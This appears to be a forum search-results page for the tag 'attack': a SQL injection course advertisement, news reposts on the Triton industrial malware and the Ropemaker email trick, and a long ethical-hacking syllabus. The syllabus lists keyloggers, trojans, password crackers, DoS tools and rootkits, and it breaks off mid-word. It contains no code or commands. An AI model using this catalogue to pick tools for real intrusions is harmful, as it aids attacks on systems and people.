Search the Community
Showing results for tags 'attack'.
-
A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
-
Symantec Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned. On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity. Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid. The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage. In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme. The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal -- but the groups' persistence, skill, the targeting of core infrastructure, and what appears to be resources at their disposal all points towards state sponsorship. In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies. Via zdnet.com
-
Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox. Dubbed Ropemaker (stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, the researcher at email and cloud security firm Mimecast. A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with the malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks. Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML) that are fundamental parts of the way information is presented on the Internet. Since CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes made to the desired 'style' of the email that is then retrieved remotely and presented to the user, without the recipient, even tech savvy users, knowing about it. According to the researchers, the Ropemaker attack could be leveraged depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website by a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch preventing users from opening up the malicious link, other users could be left at a security risk. Another attack scenario, called "Matrix Exploit" by the Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want—including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, most software systems will not flag the message as malicious. Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even the tech savvy users into interacting with a malicious URL. To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile version of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack. Via https://thehackernews.com/2017/08/change-email-content.html
-
o Sensepost Footprint Tools o Big Brother o BiLE Suite o Alchemy Network Tool o Advanced Administrative Tool o My IP Suite o Wikto Footprinting Tool o Whois Lookup o Whois o SmartWhois o ActiveWhois o LanWhois o CountryWhois o WhereIsIP o Ip2country o CallerIP o Web Data Extractor Tool o Online Whois Tools o What is MyIP o DNS Enumerator o SpiderFoot o Nslookup o Extract DNS Information • Types of DNS Records • Necrosoft Advanced DIG o Expired Domains o DomainKing o Domain Name Analyzer o DomainInspect o MSR Strider URL Tracer o Mozzle Domain Name Pro o Domain Research Tool (DRT) o Domain Status Reporter o Reggie o Locate the Network Range • ARIN • Traceroute • 3D Traceroute • NeoTrace • VisualRoute Trace • Path Analyzer Pro • Maltego • Layer Four Traceroute • Prefi x WhoIs widget • Touchgraph • VisualRoute Mail Tracker • eMailTrackerPro o 1st E-mail Address Spider o Power E-mail Collector Tool o GEOSpider o Geowhere Footprinting Tool o Google Earth o Kartoo Search Engine o Dogpile (Meta Search Engine) o Tool: WebFerret o robots.txt o WTR - Web The Ripper o Website Watcher SCANNING • Angry IP • HPing2 • Ping Sweep • Firewalk Tool • Firewalk Commands • Firewalk Output • Nmap • Nmap: Scan Methods • NMAP Scan Options • NMAP Output Format • TCP Communication Flags • Three Way Handshake o Syn Stealth/Half Open Scan o Stealth Scan o Xmas Scan o Fin Scan o Null Scan o Idle Scan o ICMP Echo Scanning/List Scan o TCP Connect/Full Open Scan o FTP Bounce Scan • Ftp Bounce Attack o SYN/FIN Scanning Using IP Fragments o UDP Scanning o Reverse Ident Scanning o RPC Scan o Window Scan o Blaster Scan o Portscan Plus, Strobe o IPSec Scan o Netscan Tools Pro o WUPS – UDP Scanner o Superscan o IPScanner o Global Network Inventory Scanner o Net Tools Suite Pack o Atelier Web Ports Traffi c Analyzer (AWPTA) o Atelier Web Security Port Scanner (AWSPS) o IPEye o ike-scan o Infi ltrator Network Security Scanner o YAPS: Yet Another Port Scanner o Advanced Port Scanner o NetworkActiv Scanner o NetGadgets o P-Ping Tools o MegaPing o LanSpy o HoverIP o LANView o NetBruteScanner o SolarWinds Engineer’s Toolset o AUTAPF o OstroSoft Internet Tools o Advanced IP Scanner o Active Network Monitor o Advanced Serial Data Logger o Advanced Serial Port Monitor o WotWeb o Antiy Ports o Port Detective Enumeration Overview of System Hacking Cycle Techniques for Enumeration NetBIOS Null Sessions o So What’s the Big Deal o DumpSec Tool o NetBIOS Enumeration Using Netview • Nbtstat Enumeration Tool • SuperScan • Enum Tool o Enumerating User Accounts • GetAcct o Null Session Countermeasure PS Tools o PsExec o PsFile o PsGetSid o PsKill o PsInfo o PsList o PsLogged On o PsLogList o PsPasswd o PsService o PsShutdown o PsSuspend o Management Information Base (MIB) o SNMPutil Example o SolarWinds o SNScan o Getif SNMP MIB Browser o UNIX Enumeration o SNMP UNIX Enumeration o SNMP Enumeration Countermeasures o LDAP enumeration o JXplorer o LdapMiner o Softerra LDAP Browser o NTP enumeration o SMTP enumeration o Smtpscan o Web enumeration o Asnumber o Lynx o Windows Active Directory Attack Tool o How To Enumerate Web Application Directories in IIS Using DirectoryServices IP Tools Scanner Enumerate Systems Using Default Password Tools: o NBTScan o NetViewX o FREENETENUMERATOR o Terminal Service Agent o TXNDS o Unicornscan o Amap o Netenum System Hacking Part 1- Cracking Password o Password Types o Types of Password Attack • Passive Online Attack: Wire Sniffi ng • Passive Online Attack: Man-in-the-middle and replay attacks • Active Online Attack: Password Guessing • Offl ine Attacks Brute force Attack Pre-computed Hashes Syllable Attack/Rule-based Attack/ Hybrid attacks Distributed network Attack Rainbow Attack • Non-Technical Attacks o PDF Password Cracker o Abcom PDF Password Cracker o Password Mitigation o Permanent Account Lockout-Employee Privilege Abuse o Administrator Password Guessing • Manual Password cracking Algorithm • Automatic Password Cracking Algorithm o Performing Automated Password Guessing • Tool: NAT • Smbbf (SMB Passive Brute Force Tool) • SmbCrack Tool: Legion • Hacking Tool: LOphtcrack o Microsoft Authentication • LM, NTLMv1, and NTLMv2 • NTLM And LM Authentication On The Wire • Kerberos Authentication • What is LAN Manager Hash? LM “Hash” Generation LM Hash • Salting • PWdump2 and Pwdump3 • Tool: Rainbowcrack • Hacking Tool: KerbCrack • Hacking Tool: NBTDeputy • NetBIOS DoS Attack • Hacking Tool: John the Ripper o Password Sniffi ng o How to Sniff SMB Credentials? o SMB Replay Attacks o Replay Attack Tool: SMBProxy o SMB Signing o Tool: LCP o Tool: SID&User o Tool: Ophcrack 2 o Tool: Crack o Tool: Access PassView o Tool: Asterisk Logger o Tool: CHAOS Generator o Tool: Asterisk Key o Password Recovery Tool: MS Access Database Password Decoder o Password Cracking Countermeasures o Do Not Store LAN Manager Hash in SAM Database o LM Hash Backward Compatibility o How to Disable LM HASH o Password Brute-Force Estimate Tool o Syskey Utility o AccountAudit Part2-Escalating Privileges o Privilege Escalation o Cracking NT/2000 passwords o Active@ Password Changer • Change Recovery Console Password - Method 1 • Change Recovery Console Password - Method 2 o Privilege Escalation Tool: x.exe Part3-Executing applications o Tool: psexec o Tool: remoexec o Ras N Map o Tool: Alchemy Remote Executor o Emsa FlexInfo Pro o Keystroke Loggers o E-mail Keylogger o Revealer Keylogger Pro o Handy Keylogger o Ardamax Keylogger o Powered Keylogger o Quick Keylogger o Spy-Keylogger o Perfect Keylogger o Invisible Keylogger o Actual Spy o SpyToctor FTP Keylogger o IKS Software Keylogger o Ghost Keylogger o Hacking Tool: Hardware Key Logger o What is Spyware? o Spyware: Spector o Remote Spy o Spy Tech Spy Agent o 007 Spy Software o Spy Buddy o Ace Spy o Keystroke Spy o Activity Monitor o Hacking Tool: eBlaster o Stealth Voice Recorder o Stealth Keylogger o Stealth Website Logger o Digi Watcher Video Surveillance o Desktop Spy Screen Capture Program o Telephone Spy o Print Monitor Spy Tool o Stealth E-Mail Redirector o Spy Software: Wiretap Professional o Spy Software: FlexiSpy o PC PhoneHome o Keylogger Countermeasures o Anti Keylogger Trojans and Backdoors Effect on Business What is a Trojan? o Overt and Covert Channels o Working of Trojans o Different Types of Trojans Remote Access Trojans Data-Sending Trojans Destructive Trojans Denial-of-Service (DoS) Attack Trojans Proxy Trojans FTP Trojans Security Software Disablers o What do Trojan Creators Look for? o Different Ways a Trojan can Get into a System Indications of a Trojan Attack Ports Used by Trojans o How to Determine which Ports are Listening Trojans o Trojan: iCmd o MoSucker Trojan o Proxy Server Trojan o SARS Trojan Notifi cation o Wrappers o Wrapper Covert Program o Wrapping Tools o One Exe Maker / YAB / Pretator Wrappers o Packaging Tool: WordPad o RemoteByMail o Tool: Icon Plus o Defacing Application: Restorator o Tetris o HTTP Trojans o Trojan Attack through Http o HTTP Trojan (HTTP RAT) o Shttpd Trojan - HTTP Server o Reverse Connecting Trojans o Nuclear RAT Trojan (Reverse Connecting) o Tool: BadLuck Destructive Trojan o ICMP Tunneling o ICMP Backdoor Trojan o Microsoft Network Hacked by QAZ Trojan o Backdoor.Theef (AVP) o T2W (TrojanToWorm) o Biorante RAT o DownTroj o Turkojan o Trojan.Satellite-RAT o Yakoza o DarkLabel B4 o Trojan.Hav-Rat o Poison Ivy o Rapid Hacker o SharK o HackerzRat o TYO o 1337 Fun Trojan o Criminal Rat Beta o VicSpy o Optix PRO o ProAgent o OD Client o AceRat o Mhacker-PS o RubyRAT Public o SINner o ConsoleDevil o ZombieRat o FTP Trojan - TinyFTPD o VNC Trojan o Webcam Trojan o DJI RAT o Skiddie Rat o Biohazard RAT o Troya o ProRat o Dark Girl o DaCryptic o Net-Devil Classic Trojans Found in the Wild o Trojan: Tini o Trojan: NetBus o Trojan: Netcat o Netcat Client/Server o Netcat Commands o Trojan: Beast o Trojan: Phatbot o Trojan: Amitis o Trojan: Senna Spy o Trojan: QAZ o Trojan: Back Orifi ce o Trojan: Back Oriffi ce 2000 o Back Oriffi ce Plug-ins o Trojan: SubSeven o Trojan: CyberSpy Telnet Trojan o Trojan: Subroot Telnet Trojan o Trojan: Let Me Rule! 2.0 BETA 9 o Trojan: Donald Dick o Trojan: RECUB Hacking Tool: Loki Loki Countermeasures Atelier Web Remote Commander Trojan Horse Construction Kit How to Detect Trojans? o Netstat o fPort o TCPView Viruses and Worms Virus History Characteristics of Virus Working of Virus o Infection Phase o Attack Phase Why people create Computer Viruses Symptoms of a Virus-like Attack Virus Hoaxes Chain Letters How is a Worm Different from a Virus Indications of a Virus Attack Hardware Threats Software Threats Virus Damage Mode of Virus Infection Stages of Virus Life Virus Classifi cation How Does a Virus Infect? Storage Patterns of Virus o System Sector virus o Stealth Virus o Bootable CD-Rom Virus • Self -Modifi cation • Encryption with a Variable Key o Polymorphic Code o Metamorphic Virus o Cavity Virus o Sparse Infector Virus o Companion Virus o File Extension Virus Famous Virus/Worms – I Love You Virus Famous Virus/Worms – Melissa Famous Virus/Worms – JS/Spth Klez Virus Analysis Latest Viruses Top 10 Viruses- 2008 o Virus: Win32.AutoRun.ah o Virus:W32/Virut o Virus:W32/Divvi o Worm.SymbOS.Lasco.a o Disk Killer o Bad Boy o HappyBox o Java.StrangeBrew o MonteCarlo Family o PHP.Neworld o W32/WBoy.a o ExeBug.d o W32/Voterai.worm.e o W32/Lecivio.worm o W32/Lurka.a o W32/Vora.worm!p2p Writing a Simple Virus Program Virus Construction Kits Virus Detection Methods Virus Incident Response What is Sheep Dip? Virus Analysis – IDA Pro Tool Prevention is better than Cure Anti-Virus Software o AVG Antivirus o Norton Antivirus o McAfee o Socketsheild o BitDefender o ESET Nod32 o CA Anti-Virus o F-Secure Anti-Virus o Kaspersky Anti-Virus o F-Prot Antivirus o Panda Antivirus Platinum o avast! Virus Cleaner o ClamWin o Norman Virus Control Popular Anti-Virus Packages Virus Databases Sniffers Defi nition - Sniffi ng Protocols Vulnerable to Sniffi ng Tool: Network View – Scans the Network for Devices The Dude Sniffer Wireshark Display Filters in Wireshark Following the TCP Stream in Wireshark Cain and Abel Tcpdump Tcpdump Commands Types of Sniffi ng o Passive Sniffi ng o Active Sniffi ng What is ARP o ARP Spoofi ng Attack o How does ARP Spoofi ng Work o ARP Poising o MAC Duplicating o MAC Duplicating Attack o Tools for ARP Spoofi ng • Ettercap • ArpSpyX o MAC Flooding • Tools for MAC Flooding Linux Tool: Macof Windows Tool: Etherfl ood o Threats of ARP Poisoning o Irs-Arp Attack Tool o ARPWorks Tool o Tool: Nemesis o IP-based sniffi ng Linux Sniffi ng Tools (dsniff package) o Linux tool: Arpspoof o Linux Tool: Dnssppoof o Linux Tool: Dsniff o Linux Tool: Filesnarf o Linux Tool: Mailsnarf o Linux Tool: Msgsnarf o Linux Tool: Sshmitm o Linux Tool: Tcpkill o Linux Tool: Tcpnice o Linux Tool: Urlsnarf o Linux Tool: Webspy o Linux Tool: Webmitm DNS Poisoning Techniques o Intranet DNS Spoofi ng (Local Network) o Internet DNS Spoofi ng (Remote Network) o Proxy Server DNS Poisoning o DNS Cache Poisoning Interactive TCP Relay Interactive Replay Attacks Raw Sniffi ng Tools Features of Raw Sniffi ng Tools o HTTP Sniffer: EffeTech o Ace Password Sniffer o Win Sniffer o MSN Sniffer o SmartSniff o Session Capture Sniffer: NetWitness o Session Capture Sniffer: NWreader o Packet Crafter Craft Custom TCP/IP Packets o SMAC o NetSetMan Tool o Ntop o EtherApe o Network Probe o Maa Tec Network Analyzer o Tool: Snort o Tool: Windump o Tool: Etherpeek o NetIntercept o Colasoft EtherLook o AW Ports Traffi c Analyzer o Colasoft Capsa Network Analyzer o CommView o Sniffem o NetResident o IP Sniffer o Sniphere o IE HTTP Analyzer o BillSniff o URL Snooper o EtherDetect Packet Sniffer o EffeTech HTTP Sniffer o AnalogX Packetmon o Colasoft MSN Monitor o IPgrab o EtherScan Analyzer Social Engineering What is Social Engineering? Human Weakness “Rebecca” and “Jessica” Offi ce Workers Types of Social Engineering o Human-Based Social Engineering • Technical Support Example • More Social Engineering Examples • Human-Based Social Engineering: Eavesdropping • Human-Based Social Engineering: Shoulder Surfi ng • Human-Based Social Engineering: Dumpster Diving • Dumpster Diving Example • Oracle Snoops Microsoft’s Trash Bins • Movies to Watch for Reverse Engineering o Computer Based Social Engineering o Insider Attack o Disgruntled Employee o Preventing Insider Threat o Common Targets of Social Engineering Social Engineering Threats o Online o Telephone o Personal approaches o Defenses Against Social Engineering Threats Factors that make Companies Vulnerable to Attacks Why is Social Engineering Effective Warning Signs of an Attack Tool : Netcraft Anti-Phishing Toolbar Phases in a Social Engineering Attack Behaviors Vulnerable to Attacks Impact on the Organization Countermeasures Policies and Procedures Security Policies - Checklist Denial-of-Service Real World Scenario of DoS Attacks What are Denial-of-Service Attacks Goal of DoS Impact and the Modes of Attack Types of Attacks DoS Attack Classifi cation o Smurf Attack o Buffer Overfl ow Attack o Ping of Death Attack o Teardrop Attack o SYN Attack o SYN Flooding o DoS Attack Tools o DoS Tool: Jolt2 o DoS Tool: Bubonic.c o DoS Tool: Land and LaTierra o DoS Tool: Targa o DoS Tool: Blast o DoS Tool: Nemesy o DoS Tool: Panther2 o DoS Tool: Crazy Pinger o DoS Tool: SomeTrouble o DoS Tool: UDP Flood o DoS Tool: FSMax Bot (Derived from the Word RoBOT) Botnets Uses of Botnets How Do They Infect? Analysis Of Agabot How Do They Infect Tool: Nuclear Bot What is DDoS Attack Characteristics of DDoS Attacks DDOS Unstoppable Agent Handler Model DDoS IRC based Model DDoS Attack Taxonomy Amplifi cation Attack Refl ective DNS Attacks Refl ective DNS Attacks Tool: ihateperl.pl DDoS Tools o DDoS Tool: Trinoo o DDoS Tool: Tribal Flood Network o DDoS Tool: TFN2K o DDoS Tool: Stacheldraht o DDoS Tool: Shaft o DDoS Tool: Trinity o DDoS Tool: Knight and Kaiten o DDoS Tool: Mstream Worms Slammer Worm Spread of Slammer Worm – 30 min MyDoom.B SCO Against MyDoom Worm How to Conduct a DDoS Attack The Refl ected DoS Attacks Refl ection of the Exploit Countermeasures for Refl ected DoS DDoS Countermeasures Taxonomy of DDoS Countermeasures Preventing Secondary Victims Detect and Neutralize Handlers Detect Potential Attacks Session Hijacking What is Session Hijacking? Spoofi ng v Hijacking Steps in Session Hijacking Types of Session Hijacking Session Hijacking Levels Network Level Hijacking The 3-Way Handshake TCP Concepts 3-Way Handshake Sequence Numbers Sequence Number Prediction TCP/IP hijacking IP Spoofi ng: Source Routed Packets RST Hijacking o RST Hijacking Tool: hijack_rst.sh Blind Hijacking Man in the Middle: Packet Sniffer UDP Hijacking Application Level Hijacking Programs that Performs Session Hacking o Juggernaut o Hunt o TTY-Watcher o IP watcher o Session Hijacking Tool: T-Sight o Remote TCP Session Reset Utility (SOLARWINDS) o Paros HTTP Session Hijacking Tool o Dnshijacker Tool o Hjksuite Tool Dangers that hijacking Pose Protecting against Session Hijacking Countermeasures: IPSec Hacking Web Servers How Web Servers Work How are Web Servers Compromised Web Server Defacement o How are Servers Defaced Apache Vulnerability Attacks against IIS o IIS Components o IIS Directory Traversal (Unicode) Attack Unicode o Unicode Directory Traversal Vulnerability Hacking Tool o Hacking Tool: IISxploit.exe o Msw3prt IPP Vulnerability o RPC DCOM Vulnerability o ASP Trojan o Network Tool: Log Analyzer o Hacking Tool: CleanIISLog o ServerMask ip100 o Tool: CacheRight o Tool: CustomError o Tool: HttpZip o Tool: LinkDeny o Tool: ServerDefender AI o Tool: ZipEnable o Tool: w3compiler o Yersinia Tool: MPack Tool: Neosploit Hotfi xes and Patches What is Patch Management Patch Management Checklist o Solution: UpdateExpert o Patch Management Tool: qfecheck o Patch Management Tool: HFNetChk o cacls.exe utility o Shavlik NetChk Protect o Kaseya Patch Management o IBM Tivoli Confi guration Manager o LANDesk Patch Manager o BMC Patch Manager o Confi gureSoft Enterprise Confi guration Manager (ECM) o BladeLogic Confi guration Manager o Opsware Server Automation System (SAS) o Best Practices for Patch Management Vulnerability Scanners Online Vulnerability Search Engine Network Tool: Whisker Network Tool: N-Stealth HTTP Vulnerability Scanner Hacking Tool: WebInspect Network Tool: Shadow Security Scanner Secure IIS o ServersCheck Monitoring o GFI Network Server Monitor o Servers Alive o Webserver Stress Tool Web-Based Password Cracking Techniques Authentication - Defi nition Authentication Mechanisms o HTTP Authentication • Basic Authentication • Digest Authentication o Integrated Windows (NTLM) Authentication o Negotiate Authentication o Certifi cate-based Authentication o Forms-based Authentication o RSA SecurID Token o Biometrics Authentication • Types of Biometrics Authentication Fingerprint-based Identifi cation Hand Geometry- based Identifi cation Retina Scanning Face Recognition Face Code: WebCam Based Biometrics Authentication System Bill Gates at the RSA Conference 2006 How to Select a Good Password Things to Avoid in Passwords Changing Your Password Protecting Your Password Examples of Bad Passwords The “Mary Had A Little Lamb” Formula How Hackers Get Hold of Passwords Windows XP: Remove Saved Passwords What is a Password Cracker Modus Operandi of an Attacker Using a Password Cracker How Does a Password Cracker Work Attacks - Classifi cation o Password Guessing o Query String o Cookies o Dictionary Maker Password Crackers Available o L0phtCrack (LC4) o John the Ripper o Brutus o ObiWaN o Authforce o Hydra o Cain & Abel o RAR o Gammaprog o WebCracker o Munga Bunga o PassList o SnadBoy o MessenPass o Wireless WEP Key Password Spy o RockXP o Password Spectator Pro o Passwordstate o Atomic Mailbox Password Cracker o Advanced Mailbox Password Recovery (AMBPR) o Tool: Network Password Recovery o Tool: Mail PassView o Tool: Messenger Key o Tool: SniffPass o WebPassword o Password Administrator o Password Safe o Easy Web Password o PassReminder o My Password Manager SQL Injection What is SQL Injection Exploiting Web Applications Steps for performing SQL injection What You Should Look For What If It Doesn’t Take Input OLE DB Errors Input Validation Attack SQL injection Techniques How to Test for SQL Injection Vulnerability How Does It Work BadLogin.aspx.cs BadProductList.aspx.cs Executing Operating System Commands Getting Output of SQL Query Getting Data from the Database Using ODBC Error Message How to Mine all Column Names of a Table How to Retrieve any Data How to Update/Insert Data into Database SQL Injection in Oracle SQL Injection in MySql Database Attacking Against SQL Servers SQL Server Resolution Service (SSRS) Osql -L Probing SQL Injection Automated Tools Automated SQL Injection Tool: AutoMagic SQL Absinthe Automated SQL Injection Tool o Hacking Tool: SQLDict o Hacking Tool: SQLExec o SQL Server Password Auditing Tool: sqlbf o Hacking Tool: SQLSmack o Hacking Tool: SQL2.exe o sqlmap o sqlninja o SQLIer o Automagic SQL Injector Blind SQL Injection o Blind SQL Injection: Countermeasure o Blind SQL Injection Schema SQL Injection Countermeasures Preventing SQL Injection Attacks GoodLogin.aspx.cs SQL Injection Blocking Tool: SQL Block Acunetix Web Vulnerability Scanner Hacking Wireless Networks Introduction to Wireless o Introduction to Wireless Networking o Wired Network vs. Wireless Network o Effects of Wireless Attacks on Business o Types of Wireless Network o Advantages and Disadvantages of a Wireless Network Wireless Standards o Wireless Standard: 802.11a o Wireless Standard: 802.11b – “WiFi” o Wireless Standard: 802.11g o Wireless Standard: 802.11i o Wireless Standard: 802.11n Wireless Concepts and Devices o Related Technology and Carrier Networks o Antennas o Wireless Access Points o SSID o Beacon Frames o Is the SSID a Secret o Setting up a WLAN o Authentication and Association o Authentication Modes o The 802.1X Authentication Process WEP and WPA o Wired Equivalent Privacy (WEP) o WEP Issues o WEP - Authentication Phase o WEP - Shared Key Authentication o WEP - Association Phase o WEP Flaws o What is WPA o WPA Vulnerabilities o WEP, WPA, and WPA2 o WPA2 Wi-Fi Protected Access 2 Attacks and Hacking Tools o Terminologies o WarChalking o Authentication and (Dis) Association Attacks o WEP Attack o Cracking WEP o Weak Keys (a.k.a. Weak IVs) o Problems with WEP’s Key Stream and Reuse o Automated WEP Crackers o Pad-Collection Attacks o XOR Encryption o Stream Cipher o WEP Tool: Aircrack o Aircrack-ng o WEP Tool: AirSnort o WEP Tool: WEPCrack o WEP Tool: WepLab o Attacking WPA Encrypted Networks o Attacking WEP with WEPCrack on Windows using Cygwin o Attacking WEP with WEPCrack on Windows using PERL Interpreter o Tool: Wepdecrypt o WPA-PSK Cracking Tool: CowPatty o 802.11 Specifi c Vulnerabilities o Evil Twin: Attack o Rogue Access Points o Tools to Generate Rogue Access Points: Fake AP o Tools to Detect Rogue Access Points: Netstumbler o Tools to Detect Rogue Access Points: MiniStumbler o ClassicStumbler o AirFart o AP Radar o Hotspotter o Cloaked Access Point o WarDriving Tool: shtumble o Temporal Key Integrity Protocol (TKIP) o LEAP: The Lightweight Extensible Authentication Protocol o LEAP Attacks o LEAP Attack Tool: ASLEAP o Working of ASLEAP o MAC Sniffi ng and AP Spoofi ng o Defeating MAC Address Filtering in Windows o Manually Changing the MAC Address in Windows XP and 2000 o Tool to Detect MAC Address Spoofi ng: Wellenreiter o Man-in-the-Middle Attack (MITM) o Denial-of-Service Attacks o DoS Attack Tool: Fatajack o Hijacking and Modifying a Wireless Network o Phone Jammers o Phone Jammer: Mobile Blocker o Pocket Cellular Style Cell Phone Jammer o 2.4Ghz Wi-Fi & Wireless Camera Jammer o 3 Watt Digital Cell Phone Jammer o 3 Watt Quad Band Digital Cellular Mobile Phone Jammer o 20W Quad Band Digital Cellular Mobile Phone Jammer o 40W Digital Cellular Mobile Phone Jammer o Detecting a Wireless Network Scanning Tools o Scanning Tool: Kismet o Scanning Tool: Prismstumbler o Scanning Tool: MacStumbler o Scanning Tool: Mognet V1.16 o Scanning Tool: WaveStumbler o Scanning Tool: Netchaser V1.0 for Palm Tops o Scanning Tool: AP Scanner o Scanning Tool: Wavemon o Scanning Tool: Wireless Security Auditor (WSA) o Scanning Tool: AirTraf o Scanning Tool: WiFi Finder o Scanning Tool: Wifi Scanner o eEye Retina WiFI o Simple Wireless Scanner o wlanScanner Sniffi ng Tools o Sniffi ng Tool: AiroPeek o Sniffi ng Tool: NAI Wireless Sniffer o MAC Sniffi ng Tool: WireShark o Sniffi ng Tool: vxSniffer o Sniffi ng Tool: Etherpeg o Sniffi ng Tool: Drifnet o Sniffi ng Tool: AirMagnet o Sniffi ng Tool: WinDump o Sniffi ng Tool: Ssidsniff o Multiuse Tool: THC-RUT o Tool: WinPcap o Tool: AirPcap o AirPcap: Example Program from the Developer’s Pack Hacking Wireless Networks o Steps for Hacking Wireless Networks o Step 1: Find Networks to Attack o Step 2: Choose the Network to Attack o Step 3: Analyzing the Network o Step 4: Cracking the WEP Key o Step 5: Sniffi ng the Network Wireless Security o WIDZ: Wireless Intrusion Detection System o Radius: Used as Additional Layer in Security o Securing Wireless Networks o Wireless Network Security Checklist o WLAN Security: Passphrase o Don’ts in Wireless Security Wireless Security Tools o WLAN Diagnostic Tool: CommView for WiFi PPC o WLAN Diagnostic Tool: AirMagnet Handheld Analyzer Linux Hacking Why Linux Linux Distributions Linux Live CD-ROMs Basic Commands of Linux: Files & Directories Linux Basic o Linux File Structure o Linux Networking Commands Directories in Linux Installing, Confi guring, and Compiling Linux Kernel How to Install a Kernel Patch Compiling Programs in Linux GCC Commands Make Files Make Install Command Linux Vulnerabilities Chrooting Why is Linux Hacked How to Apply Patches to Vulnerable Programs Scanning Networks Nmap in Linux Scanning Tool: Nessus Port Scan Detection Tools Password Cracking in Linux: Xcrack Firewall in Linux: IPTables IPTables Command Basic Linux Operating System Defense SARA (Security Auditor's Research Assistant) Linux Tool: Netcat Linux Tool: tcpdump Linux Tool: Snort Linux Tool: SAINT Linux Tool: Wireshark Linux Tool: Abacus Port Sentry Linux Tool: DSniff Collection Linux Tool: Hping2 Linux Tool: Sniffi t Linux Tool: Nemesis Linux Tool: LSOF Linux Tool: IPTraf Linux Tool: LIDS Hacking Tool: Hunt Tool: TCP Wrappers Linux Loadable Kernel Modules Hacking Tool: Linux Rootkits Rootkits: Knark & Torn Rootkits: Tuxit, Adore, Ramen Rootkit: Beastkit Rootkit Countermeasures ‘chkrootkit’ detects the following Rootkits Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion Detection System Terminologies Intrusion Detection System (IDS) o IDS Placement o Ways to Detect an Intrusion o Types of Instruction Detection Systems o System Integrity Verifi ers (SIVS) o Tripwire o Cisco Security Agent (CSA) o True/False, Positive/Negative o Signature Analysis o General Indication of Intrusion: System Indications o General Indication of Intrusion: File System Indications o General Indication of Intrusion: Network Indications o Intrusion Detection Tools • Snort • Running Snort on Windows 2003 • Snort Console • Testing Snort • Confi guring Snort (snort.conf ) • Snort Rules • Set up Snort to Log to the Event Logs and to Run as a Service • Using EventTriggers.exe for Eventlog Notifi cations • SnortSam o Steps to Perform after an IDS detects an attack o Evading IDS Systems • Ways to Evade IDS • Tools to Evade IDS IDS Evading Tool: ADMutate Packet Generators What is a Firewall? o What Does a Firewall Do o Packet Filtering o What can’t a fi rewall do o How does a Firewall work o Firewall Operations o Hardware Firewall o Software Firewall o Types of Firewall • Packet Filtering Firewall • IP Packet Filtering Firewall • Circuit-Level Gateway • TCP Packet Filtering Firewall • Application Level Firewall • Application Packet Filtering Firewall • Stateful Multilayer Inspection Firewall o Packet Filtering Firewall o Firewall Identifi cation o Firewalking o Banner Grabbing o Breaching Firewalls o Bypassing a Firewall using HTTPTunnel o Placing Backdoors through Firewalls o Hiding Behind a Covert Channel: LOKI o Tool: NCovert o ACK Tunneling Common Tool for Testing Firewall and IDS o IDS testing tool: IDS Informer o IDS Testing Tool: Evasion Gateway o IDS Tool: Event Monitoring Enabling Responses to Anomalous Live Disturbances (Emerald) o IDS Tool: BlackICE o IDS Tool: Next-Generation Intrusion Detection Expert System (NIDES) o IDS Tool: SecureHost o IDS Tool: Snare o IDS Testing Tool: Traffi c IQ Professional o IDS Testing Tool: TCPOpera o IDS testing tool: Firewall Informer o Atelier Web Firewall Tester What is Honeypot? o The Honeynet Project o Types of Honeypots Low-interaction honeypot Medium-interaction honeypot High-interaction honeypot o Advantages and Disadvantages of a Honeypot o Where to place Honeypots o Honeypots • Honeypot-SPECTER • Honeypot - honeyd • Honeypot – KFSensor • Sebek o Physical and Virtual Honeypots Tools to Detect Honeypots What to do when hacked Buffer Overflows Why are Programs/Applications Vulnerable Buffer Overfl ows Reasons for Buffer Overfl 